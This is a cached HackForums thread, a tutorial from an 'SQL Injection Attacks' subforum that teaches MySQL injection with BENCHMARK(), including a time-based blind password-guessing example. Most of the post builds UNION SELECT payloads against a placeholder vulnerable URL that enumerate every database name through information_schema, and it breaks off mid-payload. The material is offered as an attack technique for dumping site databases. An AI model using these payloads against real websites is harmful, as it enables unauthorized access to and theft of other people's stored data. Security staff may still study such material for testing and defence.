<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=4134016" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=4134016" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=4134016</a>. It is a snapshot of the page as it appeared on 25 Mar 2014 14:52:26 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=4134016" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:_eDXvOwGROYJ:www.hackforums.net/showthread.php%3Ftid%3D4134016&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[SQLi tutorial] dump in one shot with Benchmark() - part #1 - Page 1</title> <meta name="description" content="SQL Injection Attacks-[SQLi tutorial] dump in one shot with Benchmark() - part #1"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=4134016"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 03-25-2014, 06:52 AM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[SQLi tutorial] dump in one shot with Benchmark() - part #1</span> </div><br><div class="quick_keys"><div class="float_left"></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=4134016" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/rating.js"></script><div id="success_rating_4134016" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_4134016"><li style="width: 0%" class="current_rating" id="current_rating_4134016">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=4134016&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4134016&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4134016&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4134016&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4134016&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_4134016" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_4134016_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=4134016" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=4134016&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_4134016");
// -->
</script><div><strong>[SQLi tutorial] dump in one shot with Benchmark() - part #1</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid39098587" id="pid39098587"></a><table class="tborder" style="border-top-width: 0; " id="post_39098587" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">Today, 05:38 AM <span id="edited_by_39098587"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4134016&amp;pid=39098587#pid39098587">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 137<br>Posts: 2,166<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">215</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39098587">We know how powerful <span style="color: #32CD32;">dump in one shot (DIOS)</span> syntax can be. I wrote about it few times in my <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">tutorials</span></a>.<br><br>Basic principle of that DIOS syntax is clear: <span style="color: #FFD700;">we want all data in selected level</span> (databases/tables/columns/data from columns). That way we can overcome <span style="color: #00BFFF;">group_concat</span> output limit of 1024 characters.<br><br>Let's see another way to dump all data we want with Benchmark().<br><br><br><span style="font-size: xx-large;"><span style="font-weight: bold;"><span style="color: #FFA500;">Function Benchmark()</span></span></span><br><br>Its syntax is:<br><br><span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #FFD700;">BENCHMARK(</span><span style="color: #32CD32;">count</span>, <span style="color: #00BFFF;">expr</span><span style="color: #FFD700;">)</span></span></span><br><br>Function executes the expression <span style="color: #00BFFF;">expr</span> repeatedly <span style="color: #32CD32;">count</span> times.<br><br>Function Benchmark is most often used in time based SQL injection, where we know syntax like:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">IF(</span><span style="color: #66CCFF">SUBSTRING</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">password</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">1</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">1</span><span style="color: #7AC07C">)&nbsp;=&nbsp;</span><span style="color: #66CCFF">CHAR</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">65</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">BENCHMARK</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">5000000</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">MD5</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">user</span><span style="color: #7AC07C">())),</span><span style="color: #66CCFF">null</span><span style="color: #7AC07C">)...&nbsp;</span><span style="color: #66CCFF">FROM&nbsp;users&nbsp;WHERE&nbsp;user_id&nbsp;</span><span style="color: #7AC07C">=&nbsp;</span><span style="color: #66CCFF">1&nbsp;<br></span></code></div></div></div><br>With our syntax we test for some time delay produced if our statement returns result <span style="color: #FFA500;">true</span>.
 If the database response is delayed, we may expect that the first user 
password character with user_id = 1 is character 'a'. How much response 
is delayed is defined with our first parameter. We used function 
Benchmark to repeat expression <span style="color: #00BFFF;">MD()</span> <span style="color: #32CD32;">5000000</span> times.<br><br><hr><br><span style="font-weight: bold;"><span style="font-size: medium;"><span style="color: #FFA500;">The fact benchmark repeats some expression N times can be used also for dump in one shot (DIOS).</span></span></span><br><br><span style="font-size: medium;"><span style="color: #32CD32;">In
 first part of this tutorials serie I will explain use of benchmark for 
DIOS step by step with lot of explanation, so all users can 
understand... Be patient while reading</span></span> <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br><br><span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #FFD700;">BENCHMARK(</span><span style="color: #32CD32;">count</span>, <span style="color: #00BFFF;">expr</span><span style="color: #FFD700;">)</span></span></span><br><br>Our <span style="color: #00BFFF;">pseudo </span>code (imagine we have 5 columns, vulnerable is column #4) will be:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">http</span><span style="color: #7AC07C">:</span><span style="color: #FFCCCC">//www.vulnerable_site.com/index.php?id=1&nbsp;and&nbsp;0&nbsp;UNION&nbsp;SELECT&nbsp;1,2,3,&nbsp;&nbsp;&nbsp;<br></span><span style="color: #66CCFF">concat<br></span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;</span><span style="color: #66CCFF">benchmark<br>&nbsp;&nbsp;</span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">count</span><span style="color: #7AC07C">,&nbsp;&nbsp;&nbsp;</span><span style="color: #FFCCCC">/*iterations*/<br>&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">expr&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FFCCCC">/*expression*/<br>&nbsp;&nbsp;</span><span style="color: #7AC07C">)<br>)<br>,</span><span style="color: #66CCFF">5</span><span style="color: #7AC07C">--&nbsp;-&nbsp;<br></span></code></div></div></div><br>Benchmark is inside of concat function, as later we will add other things to it.<br><br><span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #FFA500;">Imagine we want to display all databases.</span></span></span> Let's define first parameter:<br><br><span style="color: #32CD32;"><span style="font-weight: bold;">count</span></span> = <span style="color: #FFD700;">(Select count(*) from information_schema.schemata)</span><br><br>That part wasn't difficult to define <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/non.gif" style="vertical-align: middle;" alt="Non" title="Non" border="0"> For second parameter we want all databases in our output .<br><br><span style="color: #00BFFF;"><span style="font-weight: bold;">expr</span></span> = <span style="color: #FFD700;">(select schema_name from information_schema.schemata)</span><br><br>So our command will be:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">http</span><span style="color: #7AC07C">:</span><span style="color: #FFCCCC">//www.vulnerable_site.com/index.php?id=1&nbsp;and&nbsp;0&nbsp;UNION&nbsp;SELECT&nbsp;1,2,3,&nbsp;&nbsp;&nbsp;<br></span><span style="color: #66CCFF">concat<br></span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;@</span><span style="color: #66CCFF">output</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;</span><span style="color: #66CCFF">benchmark<br>&nbsp;&nbsp;</span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;&nbsp;&nbsp;(</span><span style="color: #66CCFF">select&nbsp;count</span><span style="color: #7AC07C">(*)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">schemata</span><span style="color: #7AC07C">),&nbsp;&nbsp;&nbsp;</span><span style="color: #FFCCCC">/*iterations*/<br>&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">@</span><span style="color: #66CCFF">output</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">CONCAT</span><span style="color: #7AC07C">(&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FFCCCC">/*expression*/<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">@</span><span style="color: #66CCFF">output</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(</span><span style="color: #66CCFF">Select&nbsp;schema_name&nbsp;from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">schemata</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;),&nbsp;<br>&nbsp;&nbsp;@</span><span style="color: #66CCFF">output<br></span><span style="color: #7AC07C">)<br>,</span><span style="color: #66CCFF">5</span><span style="color: #7AC07C">--&nbsp;-&nbsp;<br></span></code></div></div></div><br>We defined local variable <span style="color: #32CD32;">output</span>
 and initialized it with 0x00 (null). In benchmark function first 
parameter is defining number of iterations. After it we defined our 
expression where we used function concat(). In that <span style="color: #FFA500;">inner </span>concat()
 (used withing benchmark) first we added html tag for break (&lt;br&gt; =
 0x3c62723e in hex) so every new database will be in new line. After 
&lt;br&gt; schema name is added to variable <span style="color: #32CD32;">output</span>. Finally, after function benchmark finish its job, all data will be in local variable <span style="color: #32CD32;">output</span> so we added it as last parameter (right after benchmark) in our first (<span style="color: #FFD700;">outer</span>) concat.<br><br>So
 that expression will be iterated N times where N is number of 
databases. We are expecting all schema names in our output. What we get:<br><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/062c2ab2d6f45b6cc910826a62a1f177.jpg" alt="[Image: 062c2ab2d6f45b6cc910826a62a1f177.jpg]" border="0"><br><br><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/confused.gif" style="vertical-align: middle;" alt="Confused" title="Confused" border="0"> Hmm, sure. There are many databases so we must add <span style="color: #32CD32;">ONLY one database in each iteration</span>. Let's try to correct that error with adding <span style="color: #00BFFF;">limit 1</span> to our command:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">http</span><span style="color: #7AC07C">:</span><span style="color: #FFCCCC">//www.vulnerable_site.com/index.php?id=1&nbsp;and&nbsp;0&nbsp;UNION&nbsp;SELECT&nbsp;1,2,3,&nbsp;&nbsp;&nbsp;<br></span><span style="color: #66CCFF">concat<br></span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;@</span><span style="color: #66CCFF">output</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;</span><span style="color: #66CCFF">benchmark<br>&nbsp;&nbsp;</span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;&nbsp;&nbsp;(</span><span style="color: #66CCFF">select&nbsp;count</span><span style="color: #7AC07C">(*)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">schemata</span><span style="color: #7AC07C">),&nbsp;&nbsp;&nbsp;</span><span style="color: #FFCCCC">/*iterations*/<br>&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">@</span><span style="color: #66CCFF">output</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">CONCAT</span><span style="color: #7AC07C">(&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FFCCCC">/*expression*/<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">@</span><span style="color: #66CCFF">output</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(</span><span style="color: #66CCFF">Select&nbsp;schema_name&nbsp;from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">schemata&nbsp;limit&nbsp;1</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;),&nbsp;<br>&nbsp;&nbsp;@</span><span style="color: #66CCFF">output<br></span><span style="color: #7AC07C">)<br>,</span><span style="color: #66CCFF">5</span><span style="color: #7AC07C">--&nbsp;-&nbsp;<br></span></code></div></div></div><br>What we get?<br><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/67a51c7099ad6e71e9f339a5c0827a84.jpg" alt="[Image: 67a51c7099ad6e71e9f339a5c0827a84.jpg]" border="0"><br><br><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/confused.gif" style="vertical-align: middle;" alt="Confused" title="Confused" border="0">
 Hmm again. Well, of course. Our command works just fine. We iterated 4 
times (that is the number of all databases) but we always displayed <span style="color: #FFD700;">same database name</span>. Command:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">(</span><span style="color: #66CCFF">Select&nbsp;schema_name&nbsp;from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">schemata&nbsp;limit&nbsp;1</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div>returns always first database name.<br><br>OK, we must force it somehow to "move" to another database among all databases. That part is tricky but not unsolvable <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"> We will do it by ordering databases first and then by using simple condition:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">where&nbsp;next&nbsp;database&nbsp;</span><span style="color: #7AC07C">&gt;&nbsp;</span><span style="color: #66CCFF">previous&nbsp;database&nbsp;<br></span></code></div></div></div><br>We can use that simple trick if our databases are sorted.<br><br>For that scenario we will introduce new local variable - let's call it <span style="color: #FFD700;">@last_database_we_know</span>
 where last database name will be stored (of course you can use 
different name if you wish). At the beginning that new local variable 
will be initialized. Our comparison is now possible:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">where&nbsp;schema_name</span><span style="color: #7AC07C">&gt;@</span><span style="color: #66CCFF">last_database_we_know&nbsp;<br></span></code></div></div></div><br>So our final code will be:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">http</span><span style="color: #7AC07C">:</span><span style="color: #FFCCCC">//www.vulnerable_site.com/index.php?id=1&nbsp;and&nbsp;0&nbsp;UNION&nbsp;SELECT&nbsp;1,2,3,&nbsp;&nbsp;&nbsp;<br></span><span style="color: #66CCFF">concat<br></span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;@</span><span style="color: #66CCFF">output</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;@</span><span style="color: #66CCFF">last_database_we_know</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;</span><span style="color: #66CCFF">benchmark<br>&nbsp;&nbsp;</span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;&nbsp;&nbsp;(</span><span style="color: #66CCFF">select&nbsp;count</span><span style="color: #7AC07C">(*)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">schemata</span><span style="color: #7AC07C">),&nbsp;&nbsp;&nbsp;</span><span style="color: #FFCCCC">/*iterations*/<br>&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">@</span><span style="color: #66CCFF">output</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">CONCAT</span><span style="color: 